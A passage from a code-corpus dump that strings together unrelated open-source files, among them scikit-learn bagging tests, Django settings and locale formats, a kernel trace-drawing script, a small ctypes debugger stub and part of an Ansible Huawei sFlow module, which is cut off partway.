decisions3 = ensemble.decision_function(X_test)
assert_array_almost_equal(decisions1, decisions3)
def test_parallel_regression():
# Check parallel regression.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
ensemble.set_params(n_jobs=1)
y1 = ensemble.predict(X_test)
ensemble.set_params(n_jobs=2)
y2 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y2)
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=1,
random_state=0).fit(X_train, y_train)
y3 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y3)
def test_gridsearch():
# Check that bagging ensembles can be grid-searched.
# Transform iris into a binary classification task
X, y = iris.data, iris.target
y[y == 2] = 1
# Grid search with scoring based on decision_function
parameters = {'n_estimators': (1, 2),
'base_estimator__C': (1, 2)}
GridSearchCV(BaggingClassifier(SVC()),
parameters,
scoring="roc_auc").fit(X, y)
def test_base_estimator():
# Check base_estimator and its default values.
rng = check_random_state(0)
# Classification
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
ensemble = BaggingClassifier(None,
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeClassifier))
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeClassifier))
ensemble = BaggingClassifier(Perceptron(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, Perceptron))
# Regression
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(None,
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeRegressor))
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeRegressor))
ensemble = BaggingRegressor(SVR(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, SVR))
def test_bagging_with_pipeline():
estimator = BaggingClassifier(make_pipeline(SelectKBest(k=1),
DecisionTreeClassifier()),
max_features=2)
estimator.fit(iris.data, iris.target)
assert_true(isinstance(estimator[0].steps[-1][1].random_state,
int))
class DummyZeroEstimator(BaseEstimator):
def fit(self, X, y):
self.classes_ = np.unique(y)
return self
def predict(self, X):
return self.classes_[np.zeros(X.shape[0], dtype=int)]
def test_bagging_sample_weight_unsupported_but_passed():
estimator = BaggingClassifier(DummyZeroEstimator())
rng = check_random_state(0)
estimator.fit(iris.data, iris.target).predict(iris.data)
assert_raises(ValueError, estimator.fit, iris.data, iris.target,
sample_weight=rng.randint(10, size=(iris.data.shape[0])))
def test_warm_start(random_state=42):
# Test if fitting incrementally with warm start gives a forest of the
# right size and the same results as a normal fit.
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf_ws = None
for n_estimators in [5, 10]:
if clf_ws is None:
clf_ws = BaggingClassifier(n_estimators=n_estimators,
random_state=random_state,
warm_start=True)
else:
clf_ws.set_params(n_estimators=n_estimators)
clf_ws.fit(X, y)
assert_equal(len(clf_ws), n_estimators)
clf_no_ws = BaggingClassifier(n_estimators=10, random_state=random_state,
warm_start=False)
clf_no_ws.fit(X, y)
assert_equal(set([tree.random_state for tree in clf_ws]),
set([tree.random_state for tree in clf_no_ws]))
def test_warm_start_smaller_n_estimators():
# Test if warm start'ed second fit with smaller n_estimators raises error.
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf = BaggingClassifier(n_estimators=5, warm_start=True)
clf.fit(X, y)
clf.set_params(n_estimators=4)
assert_raises(ValueError, clf.fit, X, y)
def test_warm_start_equal_n_estimators():
# Test that nothing happens when fitting without increasing n_estimators
X, y = make_hastie_10_2(n_samples=20, random_state=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=43)
clf = BaggingClassifier(n_estimators=5, warm_start=True, random_state=83)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# modify X to nonsense values, this should not change anything
X_train += 1.
assert_warns_message(UserWarning,
"Warm-start fitting without increasing n_estimators does not",
clf.fit, X_train, y_train)
assert_array_equal(y_pred, clf.predict(X_test))
def test_warm_start_equivalence():
# warm started classifier with 5+5 estimators should be equivalent to
# one classifier with 10 estimators
X, y = make_hastie_10_2(n_samples=20, random_state=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=43)
clf_ws = BaggingClassifier(n_estimators=5, warm_start=True,
random_state=3141)
clf_ws.fit(X_train, y_train)
clf_ws.set_params(n_estimators=10)
clf_ws.fit(X_train, y_train)
y1 = clf_ws.predict(X_test)
clf = BaggingClassifier(n_estimators=10, warm_start=False,
random_state=3141)
clf.fit(X_train, y_train)
y2 = clf.predict(X_test)
assert_array_almost_equal(y1, y2)
def test_warm_start_with_oob_score_fails():
# Check using oob_score and warm_start simultaneously fails
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf = BaggingClassifier(n_estimators=5, warm_start=True, oob_score=True)
assert_raises(ValueError, clf.fit, X, y)
def test_oob_score_removed_on_warm_start():
X, y = make_hastie_10_2(n_samples=2000, random_state=1)
clf = BaggingClassifier(n_estimators=50, oob_score=True)
clf.fit(X, y)
clf.set_params(warm_start=True, oob_score=False, n_estimators=100)
clf.fit(X, y)
assert_raises(AttributeError, getattr, clf, "oob_score_")
def test_oob_score_consistency():
# Make sure OOB scores are identical when random_state, estimator, and
# training data are fixed and fitting is done twice
X, y = make_hastie_10_2(n_samples=200, random_state=1)
bagging = BaggingClassifier(KNeighborsClassifier(), max_samples=0.5,
max_features=0.5, oob_score=True,
random_state=1)
assert_equal(bagging.fit(X, y).oob_score_, bagging.fit(X, y).oob_score_)
def test_estimators_samples():
# Check that format of estimators_samples_ is correct and that results
# generated at fit time can be identically reproduced at a later time
# using data saved in object attributes.
X, y = make_hastie_10_2(n_samples=200, random_state=1)
bagging = BaggingClassifier(LogisticRegression(), max_samples=0.5,
max_features=0.5, random_state=1,
bootstrap=False)
bagging.fit(X, y)
# Get relevant attributes
estimators_samples = bagging.estimators_samples_
estimators_features = bagging.estimators_features_
estimators = bagging.estimators_
# Test for correct formatting
assert_equal(len(estimators_samples), len(estimators))
assert_equal(len(estimators_samples[0]), len(X))
assert_equal(estimators_samples[0].dtype.kind, 'b')
# Re-fit single estimator to test for consistent sampling
estimator_index = 0
estimator_samples = estimators_samples[estimator_index]
estimator_features = estimators_features[estimator_index]
estimator = estimators[estimator_index]
X_train = (X[estimator_samples])[:, estimator_features]
y_train = y[estimator_samples]
orig_coefs = estimator.coef_
estimator.fit(X_train, y_train)
new_coefs = estimator.coef_
assert_array_almost_equal(orig_coefs, new_coefs)
def test_max_samples_consistency():
# Make sure validated max_samples and original max_samples are identical
# when valid integer max_samples supplied by user
max_samples = 100
X, y = make_hastie_10_2(n_samples=2*max_samples, random_state=1)
bagging = BaggingClassifier(KNeighborsClassifier(),
max_samples=max_samples,
max_features=0.5, random_state=1)
bagging.fit(X, y)
assert_equal(bagging._max_samples, max_samples)
|
gpitel/pyjs
|
refs/heads/master
|
examples/libtest/WindowTest.py
|
7
|
from UnitTest import UnitTest, IN_BROWSER
from pyjamas import Window
class WindowTest(UnitTest):
"""tests for javascript object conversion"""
def onWindowResized(self, width, height):
if not self.resize_test:
self.fail("onWindowResized called after WindowListener removed")
return
nh = Window.getClientHeight()
nw = Window.getClientWidth()
# TODO: we cannot assert the exact size, because, we have toolbars
self.assertTrue(nw!=self.w)
self.assertTrue(nh!=self.h)
self.assertTrue(isinstance(nw, int))
self.assertTrue(isinstance(nh, int))
# put the window back to its original size
# but make sure to switch off resize notify!
self.resize_test = False
Window.removeWindowResizeListener(self)
Window.resize(self.w, self.h)
def testResize(self):
# TODO: window resizing does not work accuratly in browser
# because getClientWidth etc does not really match GWT. We
# need to copy the GWT implementation
if IN_BROWSER:
return
self.resize_test = True
Window.addWindowResizeListener(self)
self.h = Window.getClientHeight()
self.w = Window.getClientWidth()
Window.resize(800, 600)
def testClientDimensions(self):
h = Window.getClientHeight()
w = Window.getClientWidth()
self.assertTrue(isinstance(w, int))
self.assertTrue(isinstance(h, int))
def testLocation(self):
self.assertTrue(Window.getLocation().getHref().endswith(
'LibTest.html'))
def testTitle(self):
self.assertEquals(Window.getTitle(),
'LibTest')
|
stphivos/django-paypal
|
refs/heads/master
|
paypal/standard/pdt/tests/settings.py
|
26
|
from __future__ import unicode_literals
import os
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
# Django 1.8 and later
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
TEMPLATE_DIR,
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Django 1.7 and earlier
TEMPLATE_DIRS = [TEMPLATE_DIR]
|
balticembedded/be-kernel
|
refs/heads/be_imx_2.6.35_maintain
|
scripts/tracing/draw_functrace.py
|
14679
|
#!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
|
nasonfish/algebra-py
|
refs/heads/master
|
linear_programming.py
|
1
|
#!/usr/bin/python
"""
This program is free and open source, released into the public domain.
Daniel Barnes http://nasonfish.com/
This program is made for linear programming, as discussed in my math book.
The program accepts a list of inequalities (in the form of ax+by=c, where
a, b, and c are integers or floats in the form of `[+-]?\d+(\.\d+)?` if
you speak magic) and it essentially lays all the inequalities out
together, to create a sort of shape of a feasable region.
The program is also given a goal - minimize or maximize - and a value for
x and y.
According to the corner-point principle, one of the corners of the feasable
region can be plugged into the values for x and y to reach the best
possible way to come near the goal of minimize or maximize.
Here's an example problem:
There are two types of computers I can make. Computer A takes 10 minutes
to assemble, while Computer B takes 20 minutes.
There are 120 total minutes available to be spread among the computers.
Find the way to maximze the profit where computer A's profit is $20.00 and
Computer B's profit is $35.00
We can find the inequalities from the problem as
10x+20y<=120 because the maximum of it is 120 minutes and x and y can be
anything under that with the allowed minutes.
x and y must also be above 0, we can't make negative computers.
1x+0y>=0, 0x+1y>=0
The profit is 20x+35y.
We can pass all the information to the program as so:
nasonfish@nasonfish.com ~> ./linear_programming.py max "20x+35y" "10x+20y<=120" "1x+0y>=0" "0x+1y>=0"
Finding the max of {'y': 35.0, 'x': 20.0} with equations: [10.0x+20.0y<=120.0, 1.0x+0.0y>=0.0, 0.0x+1.0y>=0.0]
ans is 240.0 as [(12.0, 0.0)]
The maximum profit is $240 by putting all resources into
making Computer A, of which we make 12 of (it's x in the tuple of
(x, y). The list can have multiple if it needs to.)
# goal values equations, each as a separate argument. Must be in that form.
Usage: ./linear_programming.py (max|min) <a>x+<b>y [ax+by>=c ...]
"""
# This comes in handy later, trust me
from linear import Equation
import re
import sys
find_max = sys.argv[1] == "max" # max or min?
matches = re.match(r'^(-?\d+)x([+-]\d+)y$', sys.argv[2]) # 10x+20y
values = {"x": float(matches.group(1)), "y": float(matches.group(2))}
e = sys.argv[3:]
#e = map(Equation, e)
e = [Equation(s) for s in e]
copy = e[:]
points = [] # list of tuples
print("Finding the %s of %s with equations: %s" % ("max" if find_max else "min", values, e))
def check(e1, e2, lst=[]):
# find x at intersection of equations 1 and 2
# plug the x into every lst and find y.
point = intersect(e1, e2)
if not point:
return False
for e in copy:
if e is e1 or e is e2:
continue
if not e.f(point):
return False
return point
def intersect(e1, e2):
# ax + by = c
# remember that x and y, as fields, are just
# coefficients of x and y. great naming :|
# solving a system of equations:
# ax/a + by/a = c/a (1)
# dx/d + ey/d = f/d (2)
# (b/a)y - (e/d)y = c/a - f/d
# ((b/a)-(e/d))y = c/a - f/d
# y = ((c/a) - (f/d))/((b/a)-(e/d))
# x = (c - b*y)/a
if 0.0 in (e1.x, e1.y, e2.x, e2.y):
if (e1.x == 0.0 and e2.x == 0.0) or (e1.y == 0.0 and e2.y == 0.0):
return False
if e1.x == 0.0:
y = e1.c/e1.y
if e2.y == 0.0:
x = e2.c/e2.x
else:
x = (e2.c - (e2.y * y))/e2.x
if e1.y == 0.0:
x = e1.c/e1.x
if e2.x == 0.0:
y = e2.c/e2.y
else:
y = (e2.c - (e2.x * x))/e2.y
if e2.x == 0.0:
y = e2.c/e2.y
x = (e1.c - (e1.y * y))/e1.x
if e2.y == 0.0:
x = e2.c/e2.x
y = (e1.c - (e1.x * x))/e1.y
return (x, y)
# I'm actually really sorry for this. :(
y = ((e1.c/e1.x) - (e2.c/e2.x))/((e1.y/e1.x)-(e2.y/e2.x))
x = (e1.c - (e1.y*y))/e1.x
# remember of the existance of equation.f(tuple) boolean - for checking, in feasable region?
return (x, y)
# Here's something awfully complicated!
# As we loop through each expression, we remove it from the list.
# We're looping through to find every intersecting point in the list.
# Each point we find will be added to a list. then, we can use e_copy
# and compare every point's y to the line it wasn't part of.
# Essentially, we want to execute a certain function one time for
# every combonation of two equations.
# maybe McMorrow can help! :O
for expression in e:
e.remove(expression)
for ch in e:
res = check(expression, ch)
if res:
points.append(res)
ans = None
ans_pts = []
for point in points:
curr = (float(values['x']) * point[0]) + (float(values['y']) * point[1])
if not ans or (ans > curr and not find_max) or (ans < curr and find_max):
ans = curr
ans_points = [point]
elif ans == curr:
ans_points.append(point)
print "ans is %s as %s" % (ans, ans_points)
|
jobscore/sync-engine
|
refs/heads/master
|
inbox/util/stats.py
|
3
|
import statsd
from inbox.config import config
def get_statsd_client():
return statsd.StatsClient(
str(config.get("STATSD_HOST", "localhost")),
config.get("STATSD_PORT", 8125),
prefix=config.get("STATSD_PREFIX", "stats"))
statsd_client = get_statsd_client()
|
glue-viz/glue-3d-viewer
|
refs/heads/master
|
glue_vispy_viewers/volume/layer_state.py
|
3
|
from glue.core import Subset
from glue.external.echo import (CallbackProperty, SelectionCallbackProperty,
delay_callback)
from glue.core.state_objects import StateAttributeLimitsHelper
from glue.core.data_combo_helper import ComponentIDComboHelper
from ..common.layer_state import VispyLayerState
__all__ = ['VolumeLayerState']
class VolumeLayerState(VispyLayerState):
"""
A state object for volume layers
"""
attribute = SelectionCallbackProperty()
vmin = CallbackProperty()
vmax = CallbackProperty()
subset_mode = CallbackProperty('data')
limits_cache = CallbackProperty({})
def __init__(self, layer=None, **kwargs):
super(VolumeLayerState, self).__init__(layer=layer)
if self.layer is not None:
self.color = self.layer.style.color
self.alpha = self.layer.style.alpha
self.att_helper = ComponentIDComboHelper(self, 'attribute')
self.lim_helper = StateAttributeLimitsHelper(self, attribute='attribute',
lower='vmin', upper='vmax',
cache=self.limits_cache)
self.add_callback('layer', self._on_layer_change)
if layer is not None:
self._on_layer_change()
if isinstance(self.layer, Subset):
self.vmin = 0
self.vmax = 1
self.update_from_dict(kwargs)
def _on_layer_change(self, layer=None):
with delay_callback(self, 'vmin', 'vmin'):
if self.layer is None:
self.att_helper.set_multiple_data([])
else:
self.att_helper.set_multiple_data([self.layer])
def update_priority(self, name):
return 0 if name.endswith(('vmin', 'vmax')) else 1
|
ErinCall/sync-engine
|
refs/heads/master
|
migrations/versions/032_tighten_easuid.py
|
9
|
"""Tighten EAS constraints and fix easfoldersync state enum.
Revision ID: 3f96e92953e1
Revises: 55f0ff54c776
Create Date: 2014-05-21 17:43:44.556716
"""
# revision identifiers, used by Alembic.
revision = '3f96e92953e1'
down_revision = '55f0ff54c776'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.ext.declarative import declarative_base
def upgrade():
from inbox.ignition import main_engine
engine = main_engine(pool_size=1, max_overflow=0)
Base = declarative_base()
Base.metadata.reflect(engine)
if 'easfoldersync' in Base.metadata.tables:
op.alter_column('easfoldersync', 'state',
type_=sa.Enum('initial', 'initial keyinvalid',
'poll', 'poll keyinvalid', 'finish'),
existing_nullable=False,
server_default='initial')
if 'easuid' in Base.metadata.tables:
op.alter_column('easuid', 'message_id', existing_type=sa.Integer(),
nullable=False)
op.alter_column('easuid', 'fld_uid', existing_type=sa.Integer(),
nullable=False)
op.alter_column('easuid', 'msg_uid', existing_type=sa.Integer(),
nullable=False)
def downgrade():
from inbox.ignition import main_engine
engine = main_engine(pool_size=1, max_overflow=0)
Base = declarative_base()
Base.metadata.reflect(engine)
if 'easfoldersync' in Base.metadata.tables:
op.alter_column('easfoldersync', 'state',
type_=sa.Enum('initial', 'initial uidinvalid',
'poll', 'poll uidinvalid', 'finish'),
existing_nullable=False)
if 'easuid' in Base.metadata.tables:
op.alter_column('easuid', 'message_id', existing_type=sa.Integer(),
nullable=True)
op.alter_column('easuid', 'fld_uid', existing_type=sa.Integer(),
nullable=True)
op.alter_column('easuid', 'msg_uid', existing_type=sa.Integer(),
nullable=True)
|
Urinx/SomeCodes
|
refs/heads/master
|
Python/python_gray/debugger1.0/my_debugger.py
|
1
|
from ctypes import *
from my_debugger_defines import *
kernel32=windll.kernel32
class debugger(object):
def __init__(self):
pass
def load(self,path_to_exe):
"""
dwCreation flag determines how to create the process
set creation_flags=CREATE_NEW_CONSOLE if you want to see the calculator GUI
"""
creation_flags=DEBUG_PROCESS
#creation_flags=CREATE_NEW_CONSOLE
#instantiate the structs
startupinfo=STARTUPINFO()
process_information=PROCESS_INFORMATION()
"""
The following two options allow the started process to be shown as
a separate window.This also illustrates how different settings in the
STARTUPINFO struct can affect the debugger.
"""
startupinfo.dwFlags=0x1
startupinfo.wShowWindow=0x0
"""
We then initialize the cb variable in the STARTUPINFO struct
which is just the size of the struct itself
"""
startupinfo.cb=sizeof(startupinfo)
if kernel32.CreateProcessA(
path_to_exe,
None,
None,
None,
None,
creation_flags,
None,
None,
byref(startupinfo),
byref(process_information)
):
print '[*] We habe successfully launched the process!'
print '[*] PID:%d' % process_information.dwProcessId
else:
print '[*] Error:0x%08x.' % kernel32.GetLastError()
|
roselleebarle04/django
|
refs/heads/master
|
django/conf/locale/mk/formats.py
|
504
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', '%d.%m.%y', # '25.10.2006', '25.10.06'
'%d. %m. %Y', '%d. %m. %y', # '25. 10. 2006', '25. 10. 06'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
'%d. %m. %Y %H:%M:%S', # '25. 10. 2006 14:30:59'
'%d. %m. %Y %H:%M:%S.%f', # '25. 10. 2006 14:30:59.000200'
'%d. %m. %Y %H:%M', # '25. 10. 2006 14:30'
'%d. %m. %Y', # '25. 10. 2006'
'%d. %m. %y %H:%M:%S', # '25. 10. 06 14:30:59'
'%d. %m. %y %H:%M:%S.%f', # '25. 10. 06 14:30:59.000200'
'%d. %m. %y %H:%M', # '25. 10. 06 14:30'
'%d. %m. %y', # '25. 10. 06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
dagwieers/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/cloudengine/ce_sflow.py
|
32
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_sflow
version_added: "2.4"
short_description: Manages sFlow configuration on HUAWEI CloudEngine switches.
description:
- Configure Sampled Flow (sFlow) to monitor traffic on an interface in real time,
detect abnormal traffic, and locate the source of attack traffic,
ensuring stable running of the network.
author: QijunPan (@QijunPan)
options:
agent_ip:
description:
- Specifies the IPv4/IPv6 address of an sFlow agent.
source_ip:
description:
- Specifies the source IPv4/IPv6 address of sFlow packets.
collector_id:
description:
- Specifies the ID of an sFlow collector. This ID is used when you specify
the collector in subsequent sFlow configuration.
choices: ['1', '2']
collector_ip:
description:
- Specifies the IPv4/IPv6 address of the sFlow collector.
collector_ip_vpn:
description:
- Specifies the name of a VPN instance.
The value is a string of 1 to 31 case-sensitive characters, spaces not supported.
When double quotation marks are used around the string, spaces are allowed in the string.
The value C(_public_) is reserved and cannot be used as the VPN instance name.
collector_datagram_size:
description:
- Specifies the maximum length of sFlow packets sent from an sFlow agent to an sFlow collector.
The value is an integer, in bytes. It ranges from 1024 to 8100. The default value is 1400.
collector_udp_port:
description:
- Specifies the UDP destination port number of sFlow packets.
The value is an integer that ranges from 1 to 65535. The default value is 6343.
collector_meth:
description:
- Configures the device to send sFlow packets through service interfaces,
enhancing the sFlow packet forwarding capability.
The enhanced parameter is optional. No matter whether you configure the enhanced mode,
the switch determines to send sFlow packets through service cards or management port
based on the routing information on the collector.
When the value is meth, the device forwards sFlow packets at the control plane.
When the value is enhanced, the device forwards sFlow packets at the forwarding plane to
enhance the sFlow packet forwarding capacity.
choices: ['meth', 'enhanced']
collector_description:
description:
- Specifies the description of an sFlow collector.
The value is a string of 1 to 255 case-sensitive characters without spaces.
sflow_interface:
description:
- Full name of interface for Flow Sampling or Counter.
It must be a physical interface, Eth-Trunk, or Layer 2 subinterface.
sample_collector:
description:
- Indicates the ID list of the collector.
sample_rate:
description:
- Specifies the flow sampling rate in the format 1/rate.
The value is an integer and ranges from 1 to 4294967295. The default value is 8192.
sample_length:
description:
- Specifies the maximum length of sampled packets.
The value is an integer and ranges from 18 to 512, in bytes. The default value is 128.
sample_direction:
description:
- Enables flow sampling in the inbound or outbound direction.
choices: ['inbound', 'outbound', 'both']
counter_collector:
description:
- Indicates the ID list of the counter collector.
counter_interval:
description:
- Indicates the counter sampling interval.
The value is an integer that ranges from 10 to 4294967295, in seconds. The default value is 20.
export_route:
description:
- Configures the sFlow packets sent by the switch not to carry routing information.
choices: ['enable', 'disable']
rate_limit:
description:
- Specifies the rate of sFlow packets sent from a card to the control plane.
The value is an integer that ranges from 100 to 1500, in pps.
rate_limit_slot:
description:
- Specifies the slot where the rate of output sFlow packets is limited.
If this parameter is not specified, the rate of sFlow packets sent from
all cards to the control plane is limited.
The value is an integer or a string of characters.
forward_enp_slot:
description:
- Enable the Embedded Network Processor (ENP) chip function.
The switch uses the ENP chip to perform sFlow sampling,
and the maximum sFlow sampling interval is 65535.
If you set the sampling interval to be larger than 65535,
the switch automatically restores it to 65535.
The value is an integer or 'all'.
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
---
- name: sflow module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configuring sFlow Agent
ce_sflow:
agent_ip: 6.6.6.6
provider: '{{ cli }}'
- name: Configuring sFlow Collector
ce_sflow:
collector_id: 1
collector_ip: 7.7.7.7
collector_ip_vpn: vpn1
collector_description: Collector1
provider: '{{ cli }}'
- name: Configure flow sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
sample_collector: 1
sample_direction: inbound
provider: '{{ cli }}'
- name: Configure counter sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
counter_collector: 1
counter_interval: 1000
provider: '{{ cli }}'
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"agent_ip": "6.6.6.6", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"agent": {}}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"agent": {"family": "ipv4", "ipv4Addr": "1.2.3.4", "ipv6Addr": null}}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["sflow agent ip 6.6.6.6"]
changed:
description: check to see if a change was made on the device
returned: always
type: bool
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_nc_config, set_nc_config, ce_argument_spec, check_ip_addr
from ansible.module_utils.network.cloudengine.ce import get_config, load_config
CE_NC_GET_SFLOW = """
<filter type="subtree">
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<sources>
<source>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</source>
</sources>
<agents>
<agent>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</agent>
</agents>
<collectors>
<collector>
<collectorID></collectorID>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<vrfName></vrfName>
<datagramSize></datagramSize>
<port></port>
<description></description>
<meth></meth>
</collector>
</collectors>
<samplings>
<sampling>
<ifName>%s</ifName>
<collectorID></collectorID>
<direction></direction>
<length></length>
<rate></rate>
</sampling>
</samplings>
<counters>
<counter>
<ifName>%s</ifName>
<collectorID></collectorID>
<interval></interval>
</counter>
</counters>
<exports>
<export>
<ExportRoute></ExportRoute>
</export>
</exports>
</sflow>
</filter>
"""
def is_config_exist(cmp_cfg, test_cfg):
"""is configuration exist?"""
if not cmp_cfg or not test_cfg:
return False
return bool(test_cfg in cmp_cfg)
def is_valid_ip_vpn(vpname):
"""check ip vpn"""
if not vpname:
return False
if vpname == "_public_":
return False
if len(vpname) < 1 or len(vpname) > 31:
return False
return True
def get_ip_version(address):
"""get ip version fast"""
if not address:
return None
if address.count(':') >= 2 and address.count(":") <= 7:
return "ipv6"
elif address.count('.') == 3:
return "ipv4"
else:
return None
def get_interface_type(interface):
